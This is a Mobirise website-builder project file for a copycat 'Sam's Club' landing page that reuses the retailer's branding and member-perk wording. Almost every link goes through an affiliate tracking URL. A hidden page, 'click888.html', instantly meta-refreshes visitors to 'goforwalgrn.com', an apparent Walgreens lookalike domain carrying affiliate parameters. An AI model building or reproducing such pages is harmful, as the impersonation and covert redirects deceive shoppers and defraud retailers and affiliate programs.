{
  "settings": {
    "currentPage": "index.html",
    "theme": {
      "name": "mobirise5",
      "title": "Mobirise 5",
      "styling": {
        "primaryColor": "#0067a0",
        "secondaryColor": "#0067a0",
        "successColor": "#0067a0",
        "infoColor": "#0067a0",
        "warningColor": "#0067a0",
        "dangerColor": "#0067a0",
        "mainFont": "Jost",
        "display1Font": "Jost",
        "display1Size": "4",
        "display2Font": "Jost",
        "display2Size": 3,
        "display5Font": "Jost",
        "display5Size": 2,
        "display7Font": "Jost",
        "display7Size": 1.2,
        "display4Font": "Jost",
        "display4Size": 1.1,
        "isRoundedButtons": true,
        "isGhostButtonBorder": true,
        "underlinedLinks": false,
        "isAnimatedOnScroll": false,
        "isScrollToTopButton": false
      },
      "titlePreset": "Company",
      "nameSelectPreset": "company",
      "presetSourceTheme": "mobirise5",
      "additionalSetColors": [
        "#0067a0"
      ]
    },
    "path": "@PROJECT_PATH@",
    "name": "Sam's Club",
    "versionFirst": "5.6.5",
    "siteFonts": [],
    "favicon": "@PROJECT_PATH@/assets/images/cea8990866e0104fcb62ef6607e57ac3-favicon.ico",
    "mbrsiteDomain": "cygzypxibh",
    "imageResize": false,
    "robotsSwitcher": false,
    "sitemapSwitcher": false,
    "sitemapSwitcherAuto": false,
    "siteUrl": false,
    "gdpr": false,
    "cookiesAlert": false,
    "uniqCompNum": 6,
    "versionPublish": "5.6.5",
    "screenshot": "screenshot.png",
    "publishChangesOnly": true
  },
  "pages": {
    "index.html": {
      "settings": {
        "main": true,
        "title": "Sam's Club | Wholesale Prices on Top Brands",
        "meta_descr": "Sam's Club | Wholesale Prices on Top Brands",
        "header_custom": "",
        "footer_custom": "",
        "html_before": ""
      },
      "components": [
        {
          "alias": false,
          "_styles": {
            "& when not (@fullScreen)": {
              "padding-top": "(@paddingTop * 1rem)",
              "padding-bottom": "(@paddingBottom * 1rem)"
            },
            "& when (@bg-type = \"image\")": {
              "background-image": "url(@bg-value)"
            },
            "& when (@bg-type = \"color\")": {
              "background-color": "@bg-value"
            },
            "& when (@reverseContent)": {
              ".row": {
                "flex-direction": "row-reverse"
              }
            },
            "& when (@fullWidth)": {
              "& when (@imageFullWidth)": {
                ".container-fluid": {
                  "padding": "0"
                },
                ".text-wrapper": {
                  "padding": "0 4rem",
                  "@media (max-width: 768px)": {
                    "padding": "0 2rem"
                  }
                }
              }
            },
            ".image-wrapper": {
              "@media (max-width: 991px)": {
                "margin-bottom": "2rem"
              },
              "img": {
                "width": "100%",
                "object-fit": "cover"
              }
            },
            ".text-wrapper": {
              "@media (min-width: 992px)": {
                "padding": "0 2rem",
                "& when (@fullWidth)": {
                  "padding": "0 4rem"
                }
              },
              "@media (max-width: 768px)": {
                "margin-bottom": "2rem"
              }
            },
            ".mbr-text, .mbr-section-btn": {
              "color": "#0067a0",
              "text-align": "center"
            },
            ".mbr-section-title": {
              "text-align": "center",
              "color": "#0067a0"
            }
          },
          "_name": "header14",
          "_sourceTheme": "mobirise5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"header14\" group=\"Headers\" data-bg-video=\"{{bg.type == 'video' && bg.value.url}}\" mbr-class=\"{\n    'mbr-fullscreen': fullScreen,\n    'mbr-parallax-background': bg.parallax}\">\n\n    <mbr-parameters>\n        <header>Size</header>\n        <input type=\"checkbox\" title=\"Full Screen\" name=\"fullScreen\">\n        <input type=\"checkbox\" title=\"Full Width\" name=\"fullWidth\">\n        <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" step=\"1\" value=\"2\" condition=\"fullScreen == false\">\n        <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" step=\"1\" value=\"3\" condition=\"fullScreen == false\">\n        <input type=\"range\" inline name=\"imageWidth\" title=\"Image\" min=\"4\" max=\"8\" step=\"1\" value=\"7\">\n        <input type=\"checkbox\" title=\"Reverse\" name=\"reverseContent\" checked>\n        <header>Show/Hide</header>\n        <input type=\"checkbox\" title=\"Remove Padding\" name=\"imageFullWidth\" condition=\"fullWidth\">\n        <input type=\"checkbox\" title=\"Title\" name=\"showTitle\" checked>\n        <input type=\"checkbox\" title=\"Text\" name=\"showText\" checked>\n        <input type=\"checkbox\" title=\"Buttons\" name=\"showButtons\" checked>\n        <header>Background</header>\n        <fieldset type=\"background\" name=\"bg\" parallax>\n            <input type=\"image\" title=\"Image\" value=\"../_images/background7.jpg\" parallax>\n            <input type=\"color\" title=\"Color\" value=\"#ffffff\" selected>\n            <input type=\"video\" title=\"Video\" value=\"https://vimeo.com/428046504\">\n        </fieldset>\n        <input type=\"checkbox\" title=\"Overlay\" name=\"overlay\" condition=\"bg.type !== 'color'\" checked>\n        <input type=\"color\" title=\"Overlay Color\" name=\"overlayColor\" value=\"#ffffff\" condition=\"overlay && bg.type !== 'color'\">\n        <input type=\"range\" inline title=\"Opacity\" name=\"overlayOpacity\" min=\"0\" max=\"1\" step=\"0.1\" value=\"0.8\" condition=\"overlay && bg.type !== 'color'\">\n    </mbr-parameters>\n\n    <div class=\"mbr-overlay\" mbr-if=\"overlay && bg.type !== 'color'\" opacity=\"{{overlayOpacity}}\" bg-color=\"{{overlayColor}}\"></div>\n\n    <div mbr-class=\"{'container': !fullWidth, 'container-fluid': fullWidth}\">\n        <div class=\"row justify-content-center align-items-center\">\n            <div class=\"col-12 col-md-{{imageWidth}} image-wrapper\">\n                <a href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\"><img src=\"@PROJECT_PATH@/assets/images/9e6ea4c50cccb16c077ae0b9d221c9ab-20220301-hppov-springrefresh-d-wid1140.webp\" alt=\"Sam's Club\"></a>\n            </div>\n            <div class=\"col-12 col-md\">\n                <div class=\"text-wrapper\">\n                    <h1 class=\"mbr-section-title mbr-fonts-style mb-3\" data-app-selector=\".mbr-section-title\" mbr-theme-style=\"display-1\" mbr-if=\"showTitle\"><b><a href=\"click888.html\" class=\"text-primary\">WELCOME TO&nbsp;</a></b><a href=\"https://c.duomai.com/track.php?site_id=708569&aid=14234&euid=&t=https%3A%2F%2Fwww.aloyoga.com%2F&dm_fid=16079\" class=\"text-primary\" style=\"font-weight: bold;\"><br></a><b>Sam's Club</b></h1>\n                    <p class=\"mbr-text mbr-fonts-style\" mbr-theme-style=\"display-7\" mbr-if=\"showText\" data-app-selector=\".mbr-text, .mbr-section-btn\">Join the Sam’s Club family.\n<br>For premium quality, amazing perks and members-only prices.<br></p>\n                    <div mbr-buttons mbr-theme-style=\"display-4\" class=\"mbr-section-btn mt-3\" mbr-if=\"showButtons\" data-toolbar=\"-mbrBtnMove\"><a class=\"btn btn-black\" href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\" data-app-placeholder=\"Type Text\">Shop USA Site</a>\n                        <a class=\"btn btn-black\" href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\" data-app-placeholder=\"Type Text\">Another Country</a></div>\n                </div>\n            </div>\n        </div>\n    </div>\n</section>",
          "_cid": "sFzxmVl7J6",
          "_anchor": "header14-1f",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {}
        },
        {
          "alias": false,
          "_styles": {
            "padding-top": "(@paddingTop * 1rem)",
            "padding-bottom": "(@paddingBottom * 1rem)",
            "& when (@bg-type = 'color')": {
              "background-color": "@bg-value"
            },
            "& when (@bg-type = 'image')": {
              "background-image": "url(@bg-value)"
            },
            ".mbr-iconfont": {
              "display": "block",
              "font-size": "4rem",
              "color": "@primaryColor",
              "margin-bottom": "2rem"
            },
            ".card-wrapper": {
              "min-height": "220px",
              "transition": "all 0.3s",
              "border-radius": "4px",
              "padding": "1rem",
              "background": "@cardColor",
              "display": "flex",
              "justify-content": "center",
              "align-items": "center",
              "margin-bottom": "2rem"
            }
          },
          "_name": "features2",
          "_sourceTheme": "mobirise5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"features1\" group=\"Features\" data-bg-video=\"{{bg.type == 'video' && bg.value.url}}\" mbr-class=\"{'mbr-parallax-background': bg.parallax}\">\n\n    <mbr-parameters>\n        <header>Size</header>\n        <input type=\"checkbox\" title=\"Full Width\" name=\"fullWidth\">\n        <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" step=\"1\" value=\"4\">\n        <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" step=\"1\" value=\"2\">\n\n        <header>Card</header>\n        <input type=\"color\" title=\"BG\" name=\"cardColor\" value=\"#ffffff\">\n        <input type=\"range\" title=\"Count\" name=\"cardsAmount\" min=\"1\" max=\"4\" step=\"1\" value=\"4\">\n\n        <header>Background</header>\n        <fieldset type=\"background\" name=\"bg\" parallax>\n            <input type=\"image\" title=\"Image\" value=\"../_images/background8.jpg\">\n            <input type=\"color\" title=\"Color\" value=\"#fafafa\" selected>\n            <input type=\"video\" title=\"Video\" value=\"https://vimeo.com/428046504\">\n        </fieldset>\n        <input type=\"text\" title=\"Fallback Image\" name=\"videoToImageOnMobile\" condition=\"overlay && bg.type === 'video'\">\n        <input type=\"checkbox\" title=\"Overlay\" name=\"overlay\" condition=\"bg.type !== 'color'\" checked>\n        <input type=\"color\" title=\"Overlay Color\" name=\"overlayColor\" value=\"#ffffff\" condition=\"overlay && bg.type !== 'color'\">\n        <input type=\"range\" inline title=\"Opacity\" name=\"overlayOpacity\" min=\"0\" max=\"1\" step=\"0.1\" value=\"0.5\" condition=\"overlay && bg.type !== 'color'\">\n    </mbr-parameters>\n\n    <div class=\"mbr-overlay\" mbr-if=\"overlay && bg.type!== 'color'\" mbr-style=\"{'opacity': overlayOpacity, 'background-color': overlayColor}\">\n    </div>\n    <div mbr-class=\"{'container': !fullWidth, 'container-fluid': fullWidth}\" video-to-image-on-mobile=\"{{videoToImageOnMobile}}\">\n        <div class=\"row justify-content-center\">\n            <div class=\"col-12 col-md-6 col-lg-3\">\n                <div class=\"card-wrapper\">\n                    <div class=\"card-box align-center\">\n                        <a href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\"><span mbr-icon class=\"mbr-iconfont mobi-mbri-cash mobi-mbri\"></span></a>\n                        <h4 class=\"card-title align-center mbr-black mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".card-title, .card-box\"><b>2% Sam’s Cash™.</b><br><b>\n</b><div><b>On qualifying purchases,\n</b></div><div><b>up to $500/year.</b></div></h4>\n                    </div>\n                </div>\n            </div>\n            <div class=\"col-12 col-md-6 col-lg-3\" mbr-if=\"cardsAmount > 1\">\n                <div class=\"card-wrapper\">\n                    <div class=\"card-box align-center\">\n                        <a href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\"><span mbr-icon class=\"mbr-iconfont mobi-mbri-delivery mobi-mbri\"></span></a>\n                        <h4 class=\"card-title align-center mbr-black mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".card-title, .card-box\"><b>Free Shipping.\n</b><div><b>Every day at\n</b></div><div><b>SamsClub.com.</b></div><div><b>\n</b></div></h4>\n                    </div>\n                </div>\n            </div>\n            <div class=\"col-12 col-md-6 col-lg-3\" mbr-if=\"cardsAmount > 2\">\n                <div class=\"card-wrapper\">\n                    <div class=\"card-box align-center\">\n                        <a href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\"><span mbr-icon class=\"mbr-iconfont mobi-mbri-speed mobi-mbri\"></span></a>\n                        <h4 class=\"card-title align-center mbr-black mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".card-title, .card-box\"><b>Early shopping.\n</b><div><b>Starting 8am,\n</b></div><div><b>Monday–Saturday.</b></div></h4>\n                    </div>\n                </div>\n            </div>\n            <div class=\"col-12 col-md-6 col-lg-3\" mbr-if=\"cardsAmount > 3\">\n                <div class=\"card-wrapper\">\n                    <div class=\"card-box align-center\">\n                        <a href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\"><span mbr-icon class=\"mbr-iconfont mobi-mbri-cart-full mobi-mbri\"></span></a>\n                        <h4 class=\"card-title align-center mbr-black mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".card-title, .card-box\"><b>Early Curbside Pickup.\n</b><div><b>Starting at 7am,\n</b></div><div><b>Monday–Saturday.</b></div></h4>\n                    </div>\n                </div>\n            </div>\n        </div>\n    </div>\n</section>",
          "_cid": "t3OiMPHd5v",
          "_anchor": "features2-0",
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {},
          "_PHPplaceholders": [],
          "_JSplaceholders": []
        },
        {
          "alias": false,
          "_styles": {
            "padding-top": "(@paddingTop * 1rem)",
            "padding-bottom": "(@paddingBottom * 1rem)",
            "& when (@bg-type = 'image')": {
              "background-image": "url(@bg-value)"
            },
            "& when (@bg-type = 'color')": {
              "background-color": "@bg-value"
            },
            ".brand-item": {
              "padding-top": "1rem",
              "padding-bottom": "1rem"
            },
            ".link-item": {
              "padding-top": "1rem",
              "padding-bottom": "1rem"
            },
            ".form-item": {
              "padding-top": "1rem",
              "padding-bottom": "1rem"
            },
            ".brand-text": {
              "color": "#555555"
            },
            ".mbr-section-subtitle": {
              "margin-bottom": "20px",
              "color": "#111111"
            },
            ".list": {
              "list-style": "none",
              "padding-left": "0",
              "margin-bottom": "0rem",
              "color": "#111111"
            },
            ".item-wrap": {
              "line-height": "1.63",
              "padding": "8px 0"
            },
            ".copyright": {
              "color": "#111111"
            },
            ".navbar-brand": {
              "flex-shrink": "0",
              "align-items": "center",
              "margin-right": "0",
              "margin-bottom": "20px",
              "padding": "0 !important",
              "transition": "all 0.3s",
              "word-break": "break-word",
              "z-index": "1",
              ".navbar-caption": {
                "line-height": "inherit !important",
                "display": "flex",
                "& .iconfont-wrapper": {
                  "padding": "0",
                  "transform": "rotate(45deg)",
                  "& .mbr-iconfont": {
                    "order": "2",
                    "padding-left": "5px",
                    "transform": "rotate(45deg)"
                  }
                }
              },
              "& .mbr-iconfont": {
                "order": "2",
                "padding-left": "5px",
                "transform": "rotate(45deg)"
              },
              ".navbar-logo a": {
                "outline": "none"
              }
            },
            ".form-container": {
              "display": "flex",
              "align-items": "center",
              "flex-wrap": "nowrap",
              "flex-shrink": "1",
              "padding": "0 !important",
              "max-width": "500px",
              "@media (max-width: 767px)": {
                "flex-wrap": "wrap",
                "background-color": "transparent"
              },
              "& input": {
                "min-height": "48px",
                "height": "100%",
                "box-shadow": "none",
                "border": "none",
                "border-radius": "0",
                "padding": "10px 12px 10px 16px",
                "background-color": "#f8f9fc",
                "&:hover": {
                  "border": "1px solid transparent !important"
                }
              },
              ".mbr-section-btn": {
                "display": "flex",
                "padding": "0 !important",
                "width": "auto",
                "@media (max-width: 567px)": {
                  "width": "100%",
                  "margin-top": "0.75rem"
                },
                ".btn": {
                  "min-height": "48px",
                  "padding": "0 16px",
                  "max-width": "120px",
                  "border-radius": "0",
                  "flex-shrink": "0",
                  "word-break": "normal",
                  "@media (max-width: 567px)": {
                    "max-width": "100%",
                    "width": "100%"
                  }
                }
              }
            },
            ".form-email": {
              "flex-grow": "1",
              "margin": "0"
            },
            ".form-text": {
              "margin-bottom": "20px",
              "margin-top": "0",
              "color": "#555555"
            },
            ".footer-link": {
              "position": "relative",
              "color": "#111111"
            },
            ".footer-link:hover": {
              "color": "@primaryColor",
              "&:before": {
                "transform": "scaleX(1)",
                "transform-origin": "left center"
              }
            },
            ".footer-link:before": {
              "content": "''",
              "position": "absolute",
              "color": "currentColor",
              "left": "0",
              "top": "100%",
              "width": "100%",
              "border-top-width": "1px",
              "border-top-style": "solid",
              "transform": "scaleX(0)",
              "transform-origin": "right center",
              "transition": "transform 0.25s cubic-bezier(0.785, 0.135, 0.15, 0.86)"
            },
            "@media (max-width: 991px)": {
              ".brand-item": {
                "width": "40%"
              },
              ".link-item": {
                "width": "20%"
              },
              ".form-item": {
                "width": "100%"
              }
            },
            "@media (max-width: 767px)": {
              ".brand-item": {
                "width": "100% !important"
              },
              ".link-item": {
                "width": "100% !important"
              }
            }
          },
          "_name": "footer1",
          "_sourceTheme": "appm5",
          "_customHTML": "<section data-bs-version=\"5.1\" class=\"footer1\" group=\"Footers\" data-bg-video=\"{{bg.type == 'video' && bg.value.url}}\" global once=\"footers\" mbr-class=\"{\n    'mbr-parallax-background': bg.parallax}\">\n\n    <mbr-parameters>\n        <header>Size</header>\n        <input type=\"checkbox\" title=\"Full Width\" name=\"fullWidth\">\n        <input type=\"range\" inline title=\"Top\" name=\"paddingTop\" min=\"0\" max=\"10\" step=\"1\" value=\"4\">\n        <input type=\"range\" inline title=\"Bottom\" name=\"paddingBottom\" min=\"0\" max=\"10\" step=\"1\" value=\"3\">\n        <header>Show/Hide</header>\n        <input type=\"checkbox\" title=\"Logo\" name=\"showBrand\">\n        <input type=\"checkbox\" title=\"Logo Text\" name=\"showBrandText\" checked>\n        <input type=\"checkbox\" title=\"Title\" name=\"showTitle\" checked>\n        <input type=\"checkbox\" title=\"Form\" name=\"showForm\" checked>\n        <input type=\"checkbox\" title=\"Form Text\" name=\"showFormText\" checked>\n        <input type=\"checkbox\" title=\"Copyright\" name=\"showCopyright\">\n        <header>Background</header>\n        <fieldset type=\"background\" name=\"bg\" parallax>\n            <input type=\"image\" title=\"Image\" value=\"@ADDONS_PATH@/appm5/components/_images/background3.jpg\">\n            <input type=\"color\" title=\"Color\" value=\"#FFFFFF\" selected>\n            <input type=\"video\" title=\"Video\" value=\"https://vimeo.com/428046504\">\n        </fieldset>\n        <input type=\"checkbox\" title=\"Overlay\" name=\"overlay\" condition=\"bg.type !== 'color'\" checked>\n        <input type=\"color\" title=\"Overlay Color\" name=\"overlayColor\" value=\"#ffffff\" condition=\"overlay && bg.type !== 'color'\">\n        <input type=\"range\" inline title=\"Opacity\" name=\"overlayOpacity\" min=\"0\" max=\"1\" step=\"0.1\" value=\"0.6\" condition=\"overlay && bg.type !== 'color'\">\n    </mbr-parameters>\n    <div class=\"mbr-overlay\" mbr-if=\"overlay && bg.type !== 'color'\" opacity=\"{{overlayOpacity}}\" bg-color=\"{{overlayColor}}\"></div>\n    <div mbr-class=\"{'container': !fullWidth, 'container-fluid': fullWidth}\">\n        <div class=\"row mbr-white\">\n            <div class=\"col-lg-3 brand-item\">\n                <div class=\"navbar-brand\">\n                    <div mbr-if=\"showBrand\" mbr-buttons mbr-theme-style=\"display-5\" class=\"navbar-caption-wrap\" data-toolbar=\"-mbrBtnMove,-mbrBtnAdd,-mbrBtnRemove,-iconFont\"><a class=\"navbar-caption text-black\" data-app-selector=\".navbar-caption\" href=\"https://mobiri.se\" data-app-placeholder=\"Type Text\"><b>AppM5</b>\n                <div class=\"iconfont-wrapper\" mbr-if=\"showIcon\">\n                        <span mbr-icon class=\"mbr-iconfont mobi-mbri-up mobi-mbri\" style=\"font-size: 20px; color:#0057fc; transform: rotate(45deg);\"></span>\n                    </div>\n                </a></div>\n                </div>\n                <p class=\"mbr-text mbr-fonts-style brand-text\" mbr-theme-style=\"display-7\" mbr-if=\"showBrandText\" data-app-selector=\".brand-text\"><a href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\" class=\"text-primary\">Join the Sam’s Club family.\n</a><br><a href=\"https://c.duomai.com/track.php?site_id=708569&aid=4598&euid=&t=https%3A%2F%2Fwww.samsclub.com%2F&dm_fid=16079\" class=\"text-primary\">For premium quality, amazing perks and members-only prices.</a></p>\n            </div>\n            <div class=\"col-lg-2 link-item\">\n                <h5 mbr-text class=\"mbr-section-subtitle mbr-fonts-style\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-4\" mbr-if=\"showTitle\">\n                    <b>Membership</b>\n                </h5>\n                <ul class=\"list mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".list\" data-multiline mbr-article>\n                    <li class=\"mbr-text item-wrap\">Join Sam's Club</li><li class=\"mbr-text item-wrap\">Member's Mark</li>\n                    <li class=\"mbr-text item-wrap\">For Suppliers</li><li class=\"mbr-text item-wrap\">Renew Your Membership</li>\n                </ul>\n            </div>\n            <div class=\"col-lg-2 link-item\">\n                <h5 mbr-text class=\"mbr-section-subtitle mbr-fonts-style\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-4\" mbr-if=\"showTitle\"><b>Shipping &amp; Delivery</b></h5>\n                <ul class=\"list mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".list\" data-multiline mbr-article>\n                    <li class=\"mbr-text item-wrap\">Track Orders</li><li class=\"mbr-text item-wrap\">Shipping FAQs</li><li class=\"mbr-text item-wrap\">Pickup</li><li class=\"mbr-text item-wrap\">Return &amp; Refunds</li>\n                </ul>\n            </div>\n            <div class=\"col-lg-2 link-item\">\n                <h5 mbr-text class=\"mbr-section-subtitle mbr-fonts-style\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-4\" mbr-if=\"showTitle\">\n                    <b>Resources</b>\n                </h5>\n                <ul class=\"list mbr-fonts-style\" mbr-theme-style=\"display-7\" data-app-selector=\".list\" data-multiline mbr-article>\n                    <li class=\"mbr-text item-wrap\">About Us</li>\n                    <li class=\"mbr-text item-wrap\"><a href class=\"footer-link\">Newsroom</a></li>\n                    <li class=\"mbr-text item-wrap\"><a href class=\"footer-link\">Careers</a></li>\n                    <li class=\"mbr-text item-wrap\"><a href class=\"footer-link\">Truckloads</a></li>\n                </ul>\n            </div>\n            <div class=\"col-lg-3 form-item\">\n                <h5 mbr-text class=\"mbr-section-subtitle mbr-fonts-style\" data-app-selector=\".mbr-section-subtitle\" mbr-theme-style=\"display-4\" mbr-if=\"showTitle\">\n                    <b>Newsletter</b>\n                </h5>\n                <div mbr-form class=\"mbr-form\">\n                    <form action name=\"Form Name\" method=\"POST\" class=\"mbr-form form-with-styler\">\n                        <div class=\"row\">\n                            <div hidden=\"hidden\" data-form-alert class=\"alert alert-success col-12\">Thanks for filling out\n                                the form!</div>\n                            <div hidden=\"hidden\" data-form-alert-danger class=\"alert alert-danger col-12\">Oops...! some\n                                problem!</div>\n                        </div>\n                        <div class=\"dragArea row\">\n                            <div class=\"col-12\">\n                                <p mbr-theme-style=\"display-7\" class=\"form-text mbr-fonts-style\" data-app-selector=\".form-text\" mbr-if=\"showFormText\">Get updates on savings events, special offers, new items, in-club events and more.</p>\n                            </div>\n                            <div class=\"from-wrap\" mbr-if=\"showForm\">\n                                <div class=\"form-container col-12\">\n                                    <div class=\"form-email form-group\" data-for=\"email\">\n                                        <input type=\"email\" name=\"email\" placeholder=\"Your email address\" data-form-field=\"email\" class=\"form-control\" value>\n                                    </div>\n                                    <div mbr-buttons=\"true\" mbr-theme-style=\"display-4\" data-toolbar=\"-mbrBtnMove,-mbrLink,-mbrBtnRemove,-mbrBtnAdd\" class=\" mbr-section-btn\">\n                                        <a data-toolbar=\"-mbrBtnMove,-mbrLink,-mbrBtnRemove,-mbrBtnAdd\" type=\"submit\" class=\"btn btn-primary\">Subscribe</a>\n                                    </div>\n                                </div>\n                            </div>\n                        </div>\n                    </form>\n                </div>\n            </div>\n            <div class=\"col-12 mt-4\" mbr-if=\"showCopyright\">\n                <p class=\"mbr-text mb-0 mbr-fonts-style copyright align-center\" mbr-theme-style=\"display-7\" data-app-selector=\".copyright\" data-app-placeholder=\"Type Text\">\n                    © Copyright 2025 Mobirise - All Rights Reserved\n                </p>\n            </div>\n        </div>\n    </div>\n</section>",
          "_cid": "t3OknkF9e8",
          "_anchor": "footer1-1",
          "_protectedParams": [],
          "_global": true,
          "_once": "footers",
          "_params": {}
        }
      ]
    },
    "click888.html": {
      "settings": {
        "title": "redirect",
        "order": 1
      },
      "components": [
        {
          "alias": false,
          "_styles": {},
          "_name": "footer1",
          "_sourceTheme": "appm5",
          "_customHTML": "<html><head><link rel=\"icon\" type=\"image/gif\" href=\"data:image/gif;base64,R0lGODlhAQABAPAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==\"/><meta http-equiv=\"refresh\" content=\"0;URL='https://goforwalgrn.com/?a=474&c=1199&s1='\" /></head><body></body></html>",
          "_cid": "t3OknkF9e8",
          "_anchor": "footer1-5",
          "_PHPplaceholders": [],
          "_JSplaceholders": [],
          "_protectedParams": [],
          "_global": false,
          "_once": false,
          "_params": {}
        }
      ]
    }
  }
}